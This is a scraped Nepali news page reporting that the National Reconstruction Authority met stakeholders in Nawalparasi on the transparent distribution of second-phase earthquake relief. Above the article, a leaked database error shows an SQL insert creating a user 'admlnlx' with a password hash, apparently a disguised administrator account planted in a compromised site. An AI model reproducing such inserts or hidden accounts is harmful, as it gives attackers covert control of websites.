WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BbbDHT/9wA9Cm3SlfguSkXGI.DGcTG1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 22:59:38', '', 'admlnlx', 'admlnlx')
नवलपरासी, पुस ६ –
सरकारले भूकम्प प्रभावितलाई राहत स्वरुप उपलब्ध गराउने दोस्रो चरणको रकम पारदर्शी रुपमा प्रदान गर्ने उद्देश्यले राष्ट्रिय पुनःनिर्माण प्राधिकरणले बुधबार नवलपरासीमा सरोकारवालासँग छलफल गरेको छ ।
जिल्लामा झण्डै एक हजार परिवार पूर्ण भूकम्प प्रभावित रहेको तथ्याङ्क छन् । यस अबसरमा राष्ट्रिय पुनःनिर्माण प्राधिकरणका कार्यकारी निर्देशक सुशील ज्ञवालीले सरकारले राहत स्वरुप उपलब्ध गराएको रकम वास्तविक भूकम्प प्रभावितले मात्र पाउनुपर्नेमा जोड दिदैं यसको पारदर्शी बितरणका लागि सहयोग गर्न सम्बन्धीत सबै पक्षसंग आग्रह गर्नुभयो ।
छलफलमा जिल्लास्थित विभिन्न राजनीतिक दल, सरकारी कार्यालय र विभिन्न सङ्घ संस्थाका प्रतिनिधी, सञ्चारकर्मी र नागरिक समाजका अगुवाको सहभागिता थियो । रासस